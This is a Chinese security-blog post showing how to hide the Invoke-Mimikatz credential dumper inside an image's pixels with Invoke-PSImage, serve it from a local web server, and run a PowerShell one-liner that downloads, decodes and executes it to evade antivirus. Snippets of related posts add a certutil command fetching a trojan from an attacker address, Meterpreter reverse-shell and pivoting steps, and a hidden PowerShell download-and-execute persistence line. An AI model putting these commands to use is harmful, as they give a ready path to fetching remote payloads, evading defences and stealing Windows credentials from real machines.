<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    隱寫RGB-mimikatz讀取繞過殺軟

    VSole2023-01-07 11:07:10

    利用隱寫RGB,進行mimikatz過殺軟

    準備工作

    Invoke-PSImage.ps1Invoke-Mimikatz.ps1demo.jpg(大于100k,不然無法加載mimikatz的像素)
    

    過程

    Set-ExecutionPolicy Unrestricted -Scope CurrentUser //設置腳本策略Import-Module .\Invoke-PSimage.ps1 //導入腳本模塊Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web
    生成一個mimikatz.png
    

    開啟一個目標可以訪問的web服務,加載生成的mimikatz.png圖片。修改 example.com改成自己的web服務地址。然后進行遠程加載即可。
    利用 python3 -m http.server //開啟web服務
    

    生成的遠程加載如下

    sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.3.210:8000/mimikatz.png"));$o=a Byte[] 1355520;(0..352)|%{foreach($x in(0..3839)){$p=$g.GetPixel($x,$_);$o[$_*3840+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..1352514]));
    

    想要讀取還有在后面加

    ;Invoke-Mimikatz
    

    完整如下

    sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://192.168.3.210:8000/mimikatz.png"));$o=a Byte[] 1355520;(0..352)|%{foreach($x in(0..3839)){$p=$g.GetPixel($x,$_);$o[$_*3840+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..1352514]));Invoke-Mimikatz
    

    systemmimikatz
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    干貨!!!
    全在域環境中,用戶信息存儲在域控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 非域環境也就是在工作組環境中,當前主機用戶的密碼信息存儲著在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系統通常使用兩種方法(LM和NTLM)對用戶的明文密碼進行加密處理。 LM只能存儲小于等于14個字符的密碼hash 如果密碼大于
    過程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //設置腳本策略Import-Module .\Invoke-PSimage.ps1 //導入腳本模塊Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 開啟一個目標可以訪問的web服務,加載生成的mimikatz.png圖片。修改 example.com改成自己的web服務地址。然后進行遠程加載即可。
    mimikatz的這個功能從本質上是解析Windows的數據庫文件,從而獲取其中存儲的用戶哈希。
    后滲透
    2021-10-09 06:35:54
    如果是這種情況,您不能只是轉儲或解析 LSASS,您需要使用類似mimidrv.sys,PPLDump等 使用 Mimikatz 轉儲操作系統憑據
    主要記錄拿到Shell后再反彈MSF Shell、Mimikatz抓取密碼以及登錄域控等內網部分。前面漏洞環境搭建及打點等不作記錄,可查看參考文章。攻擊機利用Python開啟HTTP服務$ python -m SimpleHTTPServer 8080. 靶機CMD下載木馬文件$ certutil.exe -urlcache -split -f http://<攻擊者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻擊者IP>:<攻擊機監聽端口>. 并且需要遷移到權限為NT AUTHORITY\SYSTEM的進程,因為進程遷移后meterpreter的權限是遷移進程的權限。查看靶機位數&進程meterpreter > sysinfo # 查看位數。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010掃一下MS17-010meterpreter > background # 后臺掛起Session
    拿下一臺運維機,上了個CS,發現曾經連接過幾臺服務器并且保存了憑據,網上查了圈發現CS不支持交互式mimikatz,記錄下獲取遠程主機RDP憑據。
    前言本篇介紹幾款優秀的Windows上的密碼抓取工具,每個工具都有自己的特點非常實用,歡迎補充。
    powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类